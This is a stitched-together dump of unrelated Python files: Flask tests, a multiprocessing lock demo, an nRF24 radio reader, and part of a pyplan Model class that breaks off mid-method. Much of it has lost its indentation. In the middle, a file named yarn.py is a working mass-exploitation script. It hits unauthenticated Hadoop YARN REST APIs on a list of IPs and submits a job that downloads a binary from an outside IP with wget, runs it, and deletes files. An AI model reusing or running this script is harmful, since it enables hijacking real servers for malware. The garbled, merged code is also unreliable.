return u"Hällo Wörld"
@app.route("/bytes")
def from_bytes():
return u"Hällo Wörld".encode("utf-8")
@app.route("/full_tuple")
def from_full_tuple():
return (
"Meh",
400,
{"X-Foo": "Testing", "Content-Type": "text/plain; charset=utf-8"},
)
@app.route("/text_headers")
def from_text_headers():
return "Hello", {"X-Foo": "Test", "Content-Type": "text/plain; charset=utf-8"}
@app.route("/text_status")
def from_text_status():
return "Hi, status!", 400
@app.route("/response_headers")
def from_response_headers():
return (
flask.Response("Hello world", 404, {"X-Foo": "Baz"}),
{"X-Foo": "Bar", "X-Bar": "Foo"},
)
@app.route("/response_status")
def from_response_status():
return app.response_class("Hello world", 400), 500
@app.route("/wsgi")
def from_wsgi():
return NotFound()
assert client.get("/text").data == u"Hällo Wörld".encode("utf-8")
assert client.get("/bytes").data == u"Hällo Wörld".encode("utf-8")
rv = client.get("/full_tuple")
assert rv.data == b"Meh"
assert rv.headers["X-Foo"] == "Testing"
assert rv.status_code == 400
assert rv.mimetype == "text/plain"
rv = client.get("/text_headers")
assert rv.data == b"Hello"
assert rv.headers["X-Foo"] == "Test"
assert rv.status_code == 200
assert rv.mimetype == "text/plain"
rv = client.get("/text_status")
assert rv.data == b"Hi, status!"
assert rv.status_code == 400
assert rv.mimetype == "text/html"
rv = client.get("/response_headers")
assert rv.data == b"Hello world"
assert rv.headers.getlist("X-Foo") == ["Baz", "Bar"]
assert rv.headers["X-Bar"] == "Foo"
assert rv.status_code == 404
rv = client.get("/response_status")
assert rv.data == b"Hello world"
assert rv.status_code == 500
rv = client.get("/wsgi")
assert b"Not Found" in rv.data
assert rv.status_code == 404
def test_response_type_errors():
    """Invalid view return values must raise TypeError with a helpful message."""
    app = flask.Flask(__name__)
    app.testing = True

    @app.route("/none")
    def from_none():
        pass

    @app.route("/small_tuple")
    def from_small_tuple():
        return ("Hello",)

    @app.route("/large_tuple")
    def from_large_tuple():
        return "Hello", 234, {"X-Foo": "Bar"}, "???"

    @app.route("/bad_type")
    def from_bad_type():
        return True

    @app.route("/bad_wsgi")
    def from_bad_wsgi():
        return lambda: None

    c = app.test_client()

    with pytest.raises(TypeError) as e:
        c.get("/none")
    # Inspect the raised exception itself: str(e) stringifies pytest's
    # ExceptionInfo wrapper, not the exception message.
    assert "returned None" in str(e.value)

    with pytest.raises(TypeError) as e:
        c.get("/small_tuple")
    assert "tuple must have the form" in str(e.value)

    pytest.raises(TypeError, c.get, "/large_tuple")

    with pytest.raises(TypeError) as e:
        c.get("/bad_type")
    assert "it was a bool" in str(e.value)

    pytest.raises(TypeError, c.get, "/bad_wsgi")
def test_make_response(app, req_ctx):
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response("Awesome")
assert rv.status_code == 200
assert rv.data == b"Awesome"
assert rv.mimetype == "text/html"
rv = flask.make_response("W00t", 404)
assert rv.status_code == 404
assert rv.data == b"W00t"
assert rv.mimetype == "text/html"
def test_make_response_with_response_instance(app, req_ctx):
rv = flask.make_response(flask.jsonify({"msg": "W00t"}), 400)
assert rv.status_code == 400
assert rv.data == b'{"msg":"W00t"}\n'
assert rv.mimetype == "application/json"
rv = flask.make_response(flask.Response(""), 400)
assert rv.status_code == 400
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response(
flask.Response("", headers={"Content-Type": "text/html"}),
400,
[("X-Foo", "bar")],
)
assert rv.status_code == 400
assert rv.headers["Content-Type"] == "text/html"
assert rv.headers["X-Foo"] == "bar"
def test_jsonify_no_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
rv = flask.make_response(flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
compressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
pretty_response = (
b'{\n "msg": {\n "submsg": "W00t"\n }, \n "msg2": "foobar"\n}\n'
)
rv = flask.make_response(flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_jsonify_mimetype(app, req_ctx):
app.config.update({"JSONIFY_MIMETYPE": "application/vnd.api+json"})
msg = {"msg": {"submsg": "W00t"}}
rv = flask.make_response(flask.jsonify(msg), 200)
assert rv.mimetype == "application/vnd.api+json"
def test_jsonify_args_and_kwargs_check(app, req_ctx):
with pytest.raises(TypeError) as e:
flask.jsonify("fake args", kwargs="fake")
assert "behavior undefined" in str(e.value)
def test_url_generation(app, req_ctx):
@app.route("/hello/<name>", methods=["POST"])
def hello():
pass
assert flask.url_for("hello", name="test x") == "/hello/test%20x"
assert (
flask.url_for("hello", name="test x", _external=True)
== "http://localhost/hello/test%20x"
)
def test_build_error_handler(app):
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "spam")
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for("spam")
except BuildError as err:
error = err
try:
raise RuntimeError("Test case where BuildError is not current.")
except RuntimeError:
pytest.raises(BuildError, app.handle_url_build_error, error, "spam", {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return "/test_handler/"
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for("spam") == "/test_handler/"
def test_build_error_handler_reraise(app):
# Test a custom handler which reraises the BuildError
def handler_raises_build_error(error, endpoint, values):
raise error
app.url_build_error_handlers.append(handler_raises_build_error)
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "not.existing")
def test_url_for_passes_special_values_to_build_error_handler(app):
@app.url_build_error_handlers.append
def handler(error, endpoint, values):
assert values == {
"_external": False,
"_anchor": None,
"_method": None,
"_scheme": None,
}
return "handled"
with app.test_request_context():
flask.url_for("/")
def test_custom_converters(app, client):
from werkzeug.routing import BaseConverter
class ListConverter(BaseConverter):
def to_python(self, value):
return value.split(",")
def to_url(self, value):
base_to_url = super(ListConverter, self).to_url
return ",".join(base_to_url(x) for x in value)
app.url_map.converters["list"] = ListConverter
@app.route("/<list:args>")
def index(args):
return "|".join(args)
assert client.get("/1,2,3").data == b"1|2|3"
def test_static_files(app, client):
rv = client.get("/static/index.html")
assert rv.status_code == 200
assert rv.data.strip() == b"<h1>Hello World!</h1>"
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/static/index.html"
rv.close()
def test_static_url_path():
app = flask.Flask(__name__, static_url_path="/foo")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_route_with_host_matching():
app = flask.Flask(__name__, host_matching=True, static_host="example.com")
c = app.test_client()
rv = c.get("http://example.com/static/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
rv = flask.url_for("static", filename="index.html", _external=True)
assert rv == "http://example.com/static/index.html"
# Providing static_host without host_matching=True should error.
with pytest.raises(Exception):
flask.Flask(__name__, static_host="example.com")
# Providing host_matching=True with static_folder but without static_host should error.
with pytest.raises(Exception):
flask.Flask(__name__, host_matching=True)
# Providing host_matching=True without static_host but with static_folder=None should not error.
flask.Flask(__name__, host_matching=True, static_folder=None)
def test_request_locals():
assert repr(flask.g) == "<LocalProxy unbound>"
assert not flask.g
def test_test_app_proper_environ():
app = flask.Flask(__name__, subdomain_matching=True)
app.config.update(SERVER_NAME="localhost.localdomain:5000")
client = app.test_client()
@app.route("/")
def index():
return "Foo"
@app.route("/", subdomain="foo")
def subdomain():
return "Foo SubDomain"
rv = client.get("/")
assert rv.data == b"Foo"
rv = client.get("/", "http://localhost.localdomain:5000")
assert rv.data == b"Foo"
rv = client.get("/", "https://localhost.localdomain:5000")
assert rv.data == b"Foo"
app.config.update(SERVER_NAME="localhost.localdomain")
rv = client.get("/", "https://localhost.localdomain")
assert rv.data == b"Foo"
try:
app.config.update(SERVER_NAME="localhost.localdomain:443")
rv = client.get("/", "https://localhost.localdomain")
# Werkzeug 0.8
assert rv.status_code == 404
except ValueError as e:
# Werkzeug 0.7
assert str(e) == (
"the server name provided "
"('localhost.localdomain:443') does not match the "
"server name from the WSGI environment ('localhost.localdomain')"
)
try:
app.config.update(SERVER_NAME="localhost.localdomain")
rv = client.get("/", "http://foo.localhost")
# Werkzeug 0.8
assert rv.status_code == 404
except ValueError as e:
# Werkzeug 0.7
assert str(e) == (
"the server name provided "
"('localhost.localdomain') does not match the "
"server name from the WSGI environment ('foo.localhost')"
)
rv = client.get("/", "http://foo.localhost.localdomain")
assert rv.data == b"Foo SubDomain"
def test_exception_propagation(app, client):
def apprunner(config_key):
@app.route("/")
def index():
1 // 0
if config_key is not None:
app.config[config_key] = True
with pytest.raises(Exception):
client.get("/")
else:
assert client.get("/").status_code == 500
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens the context is
# not torn down. This causes other tests that run after this fail
# when they expect no exception on the stack.
for config_key in "TESTING", "PROPAGATE_EXCEPTIONS", "DEBUG", None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
@pytest.mark.parametrize("debug", [True, False])
@pytest.mark.parametrize("use_debugger", [True, False])
@pytest.mark.parametrize("use_reloader", [True, False])
@pytest.mark.parametrize("propagate_exceptions", [None, True, False])
def test_werkzeug_passthrough_errors(
monkeypatch, debug, use_debugger, use_reloader, propagate_exceptions, app
):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["passthrough_errors"] = kwargs.get("passthrough_errors")
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["PROPAGATE_EXCEPTIONS"] = propagate_exceptions
app.run(debug=debug, use_debugger=use_debugger, use_reloader=use_reloader)
def test_max_content_length(app, client):
app.config["MAX_CONTENT_LENGTH"] = 64
@app.before_request
def always_first():
flask.request.form["myfile"]
assert False
@app.route("/accept", methods=["POST"])
def accept_file():
flask.request.form["myfile"]
assert False
@app.errorhandler(413)
def catcher(error):
return "42"
rv = client.post("/accept", data={"myfile": "foo" * 100})
assert rv.data == b"42"
def test_url_processors(app, client):
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and app.url_map.is_endpoint_expecting(
endpoint, "lang_code"
):
values.setdefault("lang_code", flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop("lang_code", None)
@app.route("/<lang_code>/")
def index():
return flask.url_for("about")
@app.route("/<lang_code>/about")
def about():
return flask.url_for("something_else")
@app.route("/foo")
def something_else():
return flask.url_for("about", lang_code="en")
assert client.get("/de/").data == b"/de/about"
assert client.get("/de/about").data == b"/foo"
assert client.get("/foo").data == b"/en/about"
def test_inject_blueprint_url_defaults(app):
bp = flask.Blueprint("foo.bar.baz", __name__, template_folder="template")
@bp.url_defaults
def bp_defaults(endpoint, values):
values["page"] = "login"
@bp.route("/<page>")
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults("foo.bar.baz.view", values)
expected = dict(page="login")
assert values == expected
with app.test_request_context("/somepage"):
url = flask.url_for("foo.bar.baz.view")
expected = "/login"
assert url == expected
def test_nonascii_pathinfo(app, client):
@app.route(u"/киртест")
def index():
return "Hello World!"
rv = client.get(u"/киртест")
assert rv.data == b"Hello World!"
def test_debug_mode_complains_after_first_request(app, client):
    """In debug mode, registering a route after the first request must fail."""
    app.debug = True

    @app.route("/")
    def index():
        return "Awesome"

    assert not app.got_first_request
    assert client.get("/").data == b"Awesome"

    with pytest.raises(AssertionError) as e:

        @app.route("/foo")
        def broken():
            return "Meh"

    # Check the AssertionError's message via e.value; str(e) stringifies
    # the pytest ExceptionInfo wrapper rather than the exception.
    assert "A setup function was called" in str(e.value)

    # With debug off, late registration is allowed again.
    app.debug = False

    @app.route("/foo")
    def working():
        return "Meh"

    assert client.get("/foo").data == b"Meh"
    assert app.got_first_request
def test_before_first_request_functions(app, client):
got = []
@app.before_first_request
def foo():
got.append(42)
client.get("/")
assert got == [42]
client.get("/")
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent(app, client):
got = []
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
def get_and_assert():
client.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging(app, client):
app.debug = True
@app.route("/foo/", methods=["GET", "POST"])
def foo():
return "success"
with client:
with pytest.raises(AssertionError) as e:
client.post("/foo", data={})
assert "http://localhost/foo/" in str(e)
assert ("Make sure to directly send " "your POST-request to this URL") in str(e)
rv = client.get("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
app.debug = False
with client:
rv = client.post("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
def test_route_decorator_custom_endpoint(app, client):
app.debug = True
@app.route("/foo/")
def foo():
return flask.request.endpoint
@app.route("/bar/", endpoint="bar")
def for_bar():
return flask.request.endpoint
@app.route("/bar/123", endpoint="123")
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for("foo") == "/foo/"
assert flask.url_for("bar") == "/bar/"
assert flask.url_for("123") == "/bar/123"
assert client.get("/foo/").data == b"foo"
assert client.get("/bar/").data == b"bar"
assert client.get("/bar/123").data == b"123"
def test_preserve_only_once(app, client):
app.debug = True
@app.route("/fail")
def fail_func():
1 // 0
for x in range(3):
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
def test_preserve_remembers_exception(app, client):
app.debug = True
errors = []
@app.route("/fail")
def fail_func():
1 // 0
@app.route("/success")
def success_func():
return "Okay"
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert errors == []
# But this request triggers it, and it's an error
client.get("/success")
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
# At this point another request does nothing.
client.get("/success")
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g(app_ctx):
assert flask.g.get("x") is None
assert flask.g.get("x", 11) == 11
flask.g.x = 42
assert flask.g.get("x") == 42
assert flask.g.x == 42
def test_g_iteration_protocol(app_ctx):
flask.g.foo = 23
flask.g.bar = 42
assert "foo" in flask.g
assert "foos" not in flask.g
assert sorted(flask.g) == ["bar", "foo"]
def test_subdomain_basic_support():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain"
client = app.test_client()
@app.route("/")
def normal_index():
return "normal index"
@app.route("/", subdomain="test")
def test_index():
return "test index"
rv = client.get("/", "http://localhost.localdomain/")
assert rv.data == b"normal index"
rv = client.get("/", "http://test.localhost.localdomain/")
assert rv.data == b"test index"
def test_subdomain_matching():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
app.config["SERVER_NAME"] = "localhost.localdomain"
@app.route("/", subdomain="<user>")
def index(user):
return "index for %s" % user
rv = client.get("/", "http://mitsuhiko.localhost.localdomain/")
assert rv.data == b"index for mitsuhiko"
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/", subdomain="<user>")
def index(user):
return "index for %s" % user
rv = client.get("/", "http://mitsuhiko.localhost.localdomain:3000/")
assert rv.data == b"index for mitsuhiko"
@pytest.mark.parametrize("matching", (False, True))
def test_subdomain_matching_other_name(matching):
    """Requests to a host other than SERVER_NAME 404 only when matching is on."""
    app = flask.Flask(__name__, subdomain_matching=matching)
    app.config["SERVER_NAME"] = "localhost.localdomain:3000"
    client = app.test_client()

    @app.route("/")
    def index():
        return "", 204

    # ip address can't match name
    rv = client.get("/", "http://127.0.0.1:3000/")
    # Parenthesize the conditional: the original
    # `assert rv.status_code == 404 if matching else 204` parsed as
    # `assert (rv.status_code == 404) if matching else 204`, which always
    # passed vacuously when matching was False (204 is truthy).
    assert rv.status_code == (404 if matching else 204)

    # allow all subdomains if matching is disabled
    rv = client.get("/", "http://www.localhost.localdomain:3000/")
    assert rv.status_code == (404 if matching else 204)
def test_multi_route_rules(app, client):
@app.route("/")
@app.route("/<test>/")
def index(test="a"):
return test
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_multi_route_class_views(app, client):
class View(object):
def __init__(self, app):
app.add_url_rule("/", "index", self.index)
app.add_url_rule("/<test>/", "index", self.index)
def index(self, test="a"):
return test
_ = View(app)
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_run_defaults(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["result"] = "running..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.run()
assert rv["result"] == "running..."
def test_run_server_port(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv["result"] = "running on %s:%s ..." % (hostname, port)
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
hostname, port = "localhost", 8000
app.run(hostname, port, debug=True)
assert rv["result"] == "running on %s:%s ..." % (hostname, port)
@pytest.mark.parametrize(
"host,port,expect_host,expect_port",
(
(None, None, "pocoo.org", 8080),
("localhost", None, "localhost", 8080),
(None, 80, "pocoo.org", 80),
("localhost", 80, "localhost", 80),
),
)
def test_run_from_config(monkeypatch, host, port, expect_host, expect_port, app):
def run_simple_mock(hostname, port, *args, **kwargs):
assert hostname == expect_host
assert port == expect_port
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["SERVER_NAME"] = "pocoo.org:8080"
app.run(host, port)
def test_max_cookie_size(app, client, recwarn):
app.config["MAX_COOKIE_SIZE"] = 100
# outside app context, default to Werkzeug static value,
# which is also the default config
response = flask.Response()
default = flask.Flask.default_config["MAX_COOKIE_SIZE"]
assert response.max_cookie_size == default
# inside app context, use app config
with app.app_context():
assert flask.Response().max_cookie_size == 100
@app.route("/")
def index():
r = flask.Response("", status=204)
r.set_cookie("foo", "bar" * 100)
return r
client.get("/")
assert len(recwarn) == 1
w = recwarn.pop()
assert "cookie is too large" in str(w.message)
app.config["MAX_COOKIE_SIZE"] = 0
client.get("/")
assert len(recwarn) == 0
|
 mutex_and_join1.py | # Before running, set the "count" value in db.txt
from multiprocessing import Process, Lock
import json
import time
def search(name):
    """Simulate a read-only lookup of the remaining ticket count for *name*."""
    time.sleep(1)
    with open('db.txt', 'r', encoding='utf-8') as db_file:
        record = json.load(db_file)
    print('<%s> find tickets [%s]' % (name, record['count']))
def get(name):
    """Try to buy one ticket: re-read db.txt and decrement its count.

    Must be called while holding the shared lock, otherwise concurrent
    buyers can oversell.
    """
    time.sleep(1)
    # Use context managers: the original passed bare open() handles to
    # json.load/json.dump and leaked them until garbage collection.
    with open('db.txt', 'r', encoding='utf-8') as f:
        dic = json.load(f)
    if dic['count'] > 0:
        dic['count'] -= 1
        time.sleep(3)  # simulate write latency while holding the lock
        with open('db.txt', 'w', encoding='utf-8') as f:
            json.dump(dic, f)
        print('<%s> success!' % name)
    else:
        print('fail')
def task(name, mutex):
    """Run one buyer: concurrent lookup, then purchase serialized by *mutex*."""
    search(name)
    # `with` guarantees the lock is released even if get() raises; the
    # original acquire()/release() pair left the lock held on exception,
    # deadlocking the remaining buyer processes.
    with mutex:
        get(name)
if __name__ == "__main__":
    mutex = Lock()
    workers = []
    for i in range(5):
        p = Process(target=task, args=('user%s' % i, mutex))
        p.start()
        workers.append(p)
    # Join the children (the file's name promises it, and joining avoids
    # the parent exiting while buyers are still mid-purchase).
    for p in workers:
        p.join()
|
NRFReader.py | from nrf24 import NRF24
from threading import Thread
from struct import *
uuid = 0xCB15CA;
class NRFReader:
    """Listens on an nRF24 radio pipe and forwards telemetry to DaloyGround.

    Packets are 4 little-endian floats; each received packet is handed to
    ``DaloyGround.instance.registerEntry``.
    """

    def __init__(self):
        self.radio = NRF24()
        self.radio.begin(1, 0, "P8_23", "P8_24")
        self.radio.setRetries(3, 5)
        self.radio.setPayloadSize(32)
        self.radio.setChannel(0x60)
        self.radio.setDataRate(NRF24.BR_250KBPS)
        self.radio.setPALevel(NRF24.PA_MAX)
        self.radio.setAutoAck(1)
        self.radio.openReadingPipe(1, uuid)
        # Cycle listening once so printDetails reports the configured state.
        self.radio.startListening()
        self.radio.stopListening()
        self.radio.printDetails()

    def run(self):
        """Blocking receive loop; intended to run on the thread from start()."""
        # Deferred import to dodge a circular import at module load time,
        # hoisted out of the loop so it runs once instead of per packet.
        import DaloyGround
        import time  # the original referenced time without importing it
        # The original referenced a bare `radio` here (NameError at runtime);
        # the radio lives on the instance.
        self.radio.startListening()
        while True:
            pipe = [0]
            # Poll every 10 ms until a payload is available.
            while not self.radio.available(pipe):
                time.sleep(10000 / 1000000.0)
            recv_buffer = []
            self.radio.read(recv_buffer, self.radio.getDynamicPayloadSize())
            packet = unpack("<ffff", recv_buffer)
            DaloyGround.instance.registerEntry(packet)
            print(recv_buffer)

    def start(self):
        """Start the receive loop on a background thread and return immediately."""
        thread = Thread(target=self.run)
        thread.start()
yarn.py | import sys
import threading
import requests
import os
from Queue import *
from threading import Thread
ips = open(sys.argv[1], "r").readlines()
queue = Queue()
queue_count = 0
cmd = "cd /tmp; wget http://89.42.133.67/x86 chmod 777 *; ./x86 yarn; rm -rf *"
def rtek(host):
try:
url = 'http://' + host + ':8088/ws/v1/cluster/apps/new-application'
resp = requests.post(url, timeout=3)
app_id = resp.json()['application-id']
url = 'http://' + host + ':8088/ws/v1/cluster/apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '%s' % cmd,
},
},
'application-type': 'YARN',
}
requests.post(url, json=data, timeout=3)
print("[YARN] - %s" % host)
except:
pass
return
def main():
global queue_count
for line in ips:
line = line.strip("\r")
line = line.strip("\n")
queue_count += 1
sys.stdout.write("\r[%d] Added to queue" % (queue_count))
sys.stdout.flush()
queue.put(line)
sys.stdout.write("\n")
i = 0
while i != queue_count:
i += 1
try:
input = queue.get()
thread = Thread(target=rtek, args=(input,))
thread.start()
except KeyboardInterrupt:
os.kill(os.getpid(), 9)
thread.join()
return
if __name__ == "__main__":
main()
|
Model.py | import datetime
import importlib
import os
import re
import subprocess
import sys
import threading
import unicodedata
import environ
from shlex import split
from sys import platform
from time import sleep
import jsonpickle
import xarray as xr
from site import getsitepackages
from pyplan_engine.classes.BaseNode import BaseNode
from pyplan_engine.classes.Evaluator import Evaluator
from pyplan_engine.classes.Intellisense import Intellisense
from pyplan_engine.classes.IOModule import IOModule
from pyplan_engine.classes.PyplanFunctions import Selector
from pyplan_engine.classes.wizards import (CalculatedField, SelectColumns, SelectRows, DataframeIndex, DataframeGroupby,sourcecsv)
from pyplan_engine.common.classes.indexValuesReq import IndexValuesReq
class Model(object):
def __init__(self):
    # identifier -> BaseNode instance for every node in the model
    self._nodeDic = {}
    # node class name -> default format metadata (see getDefaultNodeFormat)
    self._nodeClassDic = dict()
    self._modelProp = {}
    # root "model" node; created by initialize()
    self._modelNode = None
    self._isLoadingModel = False
    self.initialize()
    # bumped on every evaluation so consumers can detect stale results
    self.evaluationVersion = 0
    self.inCyclicEvaluate = False
    # node id -> overriding result used while evaluating a scenario
    self._scenarioDic = dict()
    self._wizard = None
    self._currentProcessingNode = ""
    self._currentInstallProgress = []
# Props
@property
def nodeDic(self):
return self._nodeDic
@property
def modelProp(self):
return self._modelProp
@property
def modelNode(self):
return self._modelNode
@property
def isLoadingModel(self):
return self._isLoadingModel
# Methods
def getPID(self):
return os.getpid()
def getDefaultNodeFormat(self, nodeClass):
if nodeClass in self._nodeClassDic:
return self._nodeClassDic[nodeClass]
else:
return None
def getTotalMemory(self):
res = 0
for node in self.nodeDic:
res = res+self.nodeDic[node].usedMemory
return res
def getCurrentModelPath(self):
if self.existNode("current_path"):
return self.getNode("current_path").result
return ""
def setCurrentModelPath(self, value):
if self.existNode("current_path"):
self.getNode("current_path").definition = 'result="""' + \
str(value) + '"""'
def currentProcessingNode(self, nodeId):
if nodeId not in ["__evalnode__", "current_path"]:
self._currentProcessingNode = nodeId
def initialize(self, modelName=None):
if modelName is None:
self._modelNode = self.createNode("new_model", "model", "_model_")
else:
newId = modelName.lower()
newId = re.sub('[^0-9a-z]+', '_', newId)
self._modelNode = self.createNode(newId, "model", "_model_")
self._modelNode.title = modelName
self._scenarioDic = dict()
self._nodeClassDic = dict()
self._wizard = None
def createNode(self, identifier=None, nodeClass=None, moduleId=None, x=None, y=None, toObj=False, originalId=None):
"""Create new node"""
newNode = BaseNode(model=self, identifier=identifier, nodeClass=nodeClass,
moduleId=moduleId, x=x, y=y, originalId=originalId)
id = newNode.identifier
self.nodeDic[id] = newNode
newNode = None
if toObj:
return self.nodeDic[id].toObj()
else: # uso interno
return self.nodeDic[id]
def deleteNodes(self, nodes, removeAliasIfNotIn=None):
"""Delete nodes by node id"""
if not nodes is None:
for nodeId in nodes:
if self.existNode(nodeId) and nodeId != "_model_" and nodeId != "imports":
# check for module
if self.getNode(nodeId).nodeClass == "module":
childs = self.findNodes('moduleId', nodeId)
childsIds = [c.identifier for c in childs]
self.deleteNodes(childsIds, removeAliasIfNotIn)
# check for aliases
aliases = []
aliases = self.findNodes('originalId', nodeId)
if aliases:
aliasesId = [a.identifier for a in aliases]
# check for aliases in other modules
if removeAliasIfNotIn:
_auxAliases = []
for _aliasId in aliasesId:
if self.isIn(_aliasId, removeAliasIfNotIn):
_auxAliases.append(_aliasId)
if len(_auxAliases) > 0:
self.deleteNodes(
_auxAliases, removeAliasIfNotIn)
else:
self.deleteNodes(aliasesId, removeAliasIfNotIn)
self.nodeDic[nodeId].ioEngine.updateOnDeleteNode()
self.nodeDic[nodeId].release()
self.nodeDic[nodeId] = None
del self.nodeDic[nodeId]
pass
def existNode(self, nodeId):
    """Return True if the (cleared) node id exists in the model."""
    nodeId = self.clearId(nodeId)
    # Logical `and` with `is not None`: the original used the bitwise `&`
    # operator and the `not x is None` anti-idiom, which only worked
    # because both operands happened to be booleans.
    return nodeId is not None and nodeId in self.nodeDic
def getNode(self, nodeId):
    """Return the node from the node dictionary, or None if it does not exist."""
    if self.existNode(nodeId):
        return self.nodeDic[nodeId]
def isChild(self, nodeId, modulesId):
"""Return true if nodeid or one of your parents is in any of modulesId modules"""
res = False
if self.existNode(nodeId):
aux = self.getNode(nodeId).moduleId
nChance = 20
while (res == False and aux != "_model_" and nChance > 0):
res = aux in modulesId
node = self.getNode(aux)
if node:
aux = node.moduleId
else:
nChance = 0
nChance -= 1
return res
def isNodeInScenario(self, nodeId):
if nodeId in self._scenarioDic:
return True
else:
return False
def evaluateNode(self, nodeId, dims=None, rows=None, columns=None, summaryBy="sum", bottomTotal=False, rightTotal=False, fromRow=0, toRow=0):
    """Evaluate a node and return its rendered result.

    Scenario overrides in ``self._scenarioDic`` take precedence over the
    node's own result. Rendering is delegated to the Evaluator
    implementation chosen for the result's type. Returns "" when the node
    is missing or has no result.
    """
    if self.existNode(nodeId):
        result = None
        if nodeId in self._scenarioDic:
            # scenario value overrides the node's own cached result
            result = self._scenarioDic[nodeId]
        else:
            result = self.nodeDic[nodeId].result
        if not result is None:
            self.evaluationVersion += 1
            evaluator = Evaluator.createInstance(result)
            return evaluator.evaluateNode(result, self.nodeDic, nodeId, dims, rows, columns, summaryBy, bottomTotal, rightTotal, fromRow, toRow)
        else:
            return ""
def executeButton(self, nodeId):
"""Execute node of class button"""
if self.existNode(nodeId):
self.nodeDic[nodeId].invalidate()
toReturn = self.nodeDic[nodeId].result
if toReturn is None:
toReturn = ""
return toReturn
else:
return ""
def previewNode(self, nodeId):
"""Perform preview of a node"""
result = None
if self.existNode(nodeId):
if not self.nodeDic[nodeId].originalId is None:
nodeId = self.nodeDic[nodeId].originalId
if not self.nodeDic[nodeId].result is None:
self.evaluationVersion += 1
evaluator = Evaluator.createInstance(
self.nodeDic[nodeId].result)
result = evaluator.previewNode(self.nodeDic, nodeId)
if result is None:
evaluator = Evaluator.createInstance(None)
result = evaluator.generateEmptyPreviewResponse(
self.nodeDic, nodeId)
return result
def getCubeValues(self, query):
"""Evaluate node. Used for pivotgrid"""
nodeId = query["cube"]
if self.existNode(nodeId):
result = None
if nodeId in self._scenarioDic:
result = self._scenarioDic[nodeId]
else:
result = self.nodeDic[nodeId].result
if not result is None:
evaluator = Evaluator.createInstance(result)
return evaluator.getCubeValues(result, self.nodeDic, nodeId, query)
def getCubeDimensionValues(self, query):
"""Return the values of a dimension of node. Used from pivotgrid"""
nodeId = query["cube"]
if self.existNode(nodeId):
result = None
if nodeId in self._scenarioDic:
result = self._scenarioDic[nodeId]
else:
result = self.nodeDic[nodeId].result
if not result is None:
evaluator = Evaluator.createInstance(result)
return evaluator.getCubeDimensionValues(result, self.nodeDic, nodeId, query)
def getCubeMetadata(self, nodeId):
"""Return metadata of cube. Used from pivotgrid"""
if self.existNode(nodeId):
result = None
if nodeId in self._scenarioDic:
result = self._scenarioDic[nodeId]
else:
result = self.nodeDic[nodeId].result
if not result is None:
evaluator = Evaluator.createInstance(result)
return evaluator.getCubeMetadata(result, self.nodeDic, nodeId)
def setNodeValueChanges(self, changes):
"""Set values for node using filters"""
nodeId = changes["node"]
if self.existNode(nodeId):
if self.nodeDic[nodeId].nodeClass == "formnode":
